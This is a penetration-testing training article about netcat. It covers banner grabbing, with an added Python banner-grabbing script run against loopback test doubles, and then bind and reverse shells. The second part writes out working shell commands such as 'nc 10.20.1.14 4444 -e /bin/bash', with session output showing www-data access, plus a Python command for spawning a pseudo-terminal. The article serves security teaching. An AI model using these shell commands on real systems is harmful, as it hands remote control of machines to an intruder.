Now that we can identify open ports and accessible services on a target system, we can also communicate with them. In most cases, dedicated tools already exist for this purpose. Take TCP port 22, for instance: it is registered with IANA (Internet Assigned Numbers Authority) and standardised for SSH, and on a Debian system the openssh-client package provides the matching tools ssh and scp. It should be noted, however, that the standardised port assignments are merely a convention; nothing forces a service to use or reserve its registered port. Conversely, this means that an SSH server could just as well be reachable on any other port.
But how do we communicate with services that are not known to us, and how do we identify which service is behind a port in the first place? Enter netcat (nc), a tool that transports standard input and output over network connections. As we will see below, it lives up to its reputation as a Swiss Army knife. Generally speaking, netcat offers two modes of operation: it can act as a client that connects to a remote port, and as a server that listens on a local port, as the command lines further down show.
Knowing this, it makes sense to simply establish a connection with netcat on the open ports in order to receive data from the server. For illustration purposes, in this example netcat was used to establish a connection to the target system 10.250.53.33 and TCP port 1035. The port answers with SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u3, which can be interpreted as the associated software banner.
~$ nc 10.250.53.33 1035
SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u3
So with netcat we can connect to any TCP service and learn about the software and its version from what the server sends back. This technique is called banner grabbing. It should be noted, however, that a server will not necessarily send anything on its own: SSH announces itself immediately, whereas protocols such as HTTP only respond after the client has sent a request, so a silent port is not proof that nothing is listening there. Besides TCP, netcat can also send UDP datagrams (option -u); for the details we once again refer to the manpage (→ man nc).
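As an added illustration that is not part of the original article, the following Python script does by hand what `nc host port` does, plus the two things a scan needs that a bare nc session lacks: a timeout, so a silent port does not hang us, and an optional probe for services that wait for the client to speak first. The SSH banner it expects is the one shown above; the loopback servers it talks to are constructed test doubles, not real services.

```python
import socket
import threading

# Constructed sample data for the offline demo: the banner the article shows
# for TCP/1035, and a minimal HTTP reply for a service that only talks after
# it has received a request.
SSH_BANNER = b"SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u3\r\n"
HTTP_REPLY = b"HTTP/1.0 200 OK\r\nServer: Apache/2.4.10 (Debian)\r\n\r\n"
HTTP_PROBE = b"HEAD / HTTP/1.0\r\n\r\n"


def grab_banner(host, port, timeout=3.0, probe=None):
    """Connect to host:port and return the first line the service sends.

    Mirrors `nc host port` (plus typing a request when `probe` is given).
    Returns None if the port is closed/unreachable or if nothing arrives
    within `timeout`, so a silent service does not stall the scan.
    """
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            if probe:
                s.sendall(probe)
            try:
                data = s.recv(1024)
            except socket.timeout:
                return None
    except OSError:  # connection refused, unreachable, connect timed out
        return None
    text = data.decode("ascii", errors="replace")
    return text.splitlines()[0] if text.strip() else None


def fake_service(banner=None, reply=None):
    """Start a one-shot loopback service (a test double, not a real daemon).

    With `banner` it behaves like SSH and speaks first; otherwise it stays
    silent and answers `reply` only after the client has sent something,
    like an HTTP server waiting for a request.
    """
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))  # port 0: the kernel picks a free port
    srv.listen(1)
    port = srv.getsockname()[1]

    def handle():
        conn, _ = srv.accept()
        srv.close()
        with conn:
            if banner:
                conn.sendall(banner)
            else:
                conn.settimeout(5)
                try:
                    if conn.recv(1024) and reply:
                        conn.sendall(reply)
                except socket.timeout:
                    pass

    threading.Thread(target=handle, daemon=True).start()
    return port


def closed_port():
    """Reserve and immediately release a loopback port so that it is
    (almost certainly) closed when we probe it."""
    s = socket.socket()
    s.bind(("127.0.0.1", 0))
    port = s.getsockname()[1]
    s.close()
    return port


def demo():
    """Grab banners from the constructed services and return the results."""
    return {
        # SSH speaks first: one connect is enough.
        "ssh": grab_banner("127.0.0.1", fake_service(banner=SSH_BANNER), timeout=1.0),
        # An HTTP server says nothing until asked: without a probe we see nothing ...
        "http_silent": grab_banner("127.0.0.1", fake_service(reply=HTTP_REPLY), timeout=1.0),
        # ... but with a request we get its status line (and the Server header).
        "http_probed": grab_banner("127.0.0.1", fake_service(reply=HTTP_REPLY),
                                   timeout=1.0, probe=HTTP_PROBE),
        # A closed port is reported as None instead of raising.
        "closed": grab_banner("127.0.0.1", closed_port(), timeout=1.0),
    }


if __name__ == "__main__":
    for name, banner in demo().items():
        print(f"{name:12s} {banner!r}")
```

The same `grab_banner` works against a real host once the constructed loopback services are swapped for the target's address and ports; the probe argument is where a protocol-specific opener (an HTTP request, an SMTP EHLO) goes for services that do not announce themselves.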
With netcat, we can not only connect to services, but also relay the input and output of local programs across the network. Why is this function of interest to us as attackers? Let’s remind ourselves of our objective: the complete takeover or compromise of the target system. And what local program could give us more control over a system than a shell, i.e. the command interpreter itself? So if we are able to execute a single command through a previously identified security hole X, netcat can provide us with a so-called bind or reverse shell.
As the name of a bind shell suggests, we open a listening port on the target system and bind the input and output of a shell (here bash) to it. The listener has to be running on the target before we connect; to execute commands, all we have to do then is connect from our attacker machine to that remote port. Note that the -e option used below exists only in netcat-traditional (when built with GAPING_SECURITY_HOLE) and in Nmap’s Ncat; the netcat-openbsd package that Debian installs by default does not have it.
Attacker:
~$ nc 10.250.53.33 4444
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Target system:
www-data@otrs:~$ nc -lvp 4444 -e /bin/bash
listening on [any] 4444 ...
10.20.1.14: inverse host lookup failed: Host name lookup failure
connect to [10.250.53.33] from (UNKNOWN) [10.20.1.14] 59252
Unlike a bind shell, with a reverse shell we open a listening port on our attacker machine and then make the target system connect back to us; the I/O of a shell is connected to that socket. This direction is usually preferred in practice, because firewalls and NAT frequently block inbound connections to the target while permitting outbound ones. We can then send commands to our target system exactly as before:
Attacker:
~$ nc -lvp 4444
listening on [any] 4444 ...
10.250.53.33: inverse host lookup failed: Unknown host
connect to [10.20.1.14] from (UNKNOWN) [10.250.53.33] 59805
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Target system:
www-data@otrs:~$ nc 10.20.1.14 4444 -e /bin/bash
A netcat shell, whether bind or reverse, is not fully interactive: there is no pseudo-terminal (TTY) behind it, so tools that need one, such as sudo, su or the password prompt of the mysql client, refuse to work or work only to a limited extent. If Python is installed on the target, a pseudo-terminal can easily be spawned inside the netcat session (on systems that only ship Python 3, call python3 instead of python):
python -c 'import pty; pty.spawn("/bin/bash")'
Last modified: Dec. 15, 2022
Discover the world of penetration testing. Learn how to infiltrate networks and successfully penetrate systems and applications. Acquire the necessary hacking skills and apply them in professional penetration tests. Become a real penetration tester. Here you will find the free documents for the Pentest Training of binsec academy GmbH. binsec academy GmbH offers the corresponding security training lab environments and certifications; the knowledge in the wiki articles on hacking and penetration testing, however, is universal.
binsec academy GmbH is the European provider of online security training with virtual laboratory environments. The core component of all security training is the focus on practice, practice and more practice. In this wiki you will find the public and freely available course materials. You can put the theory into practice at binsec-academy.com.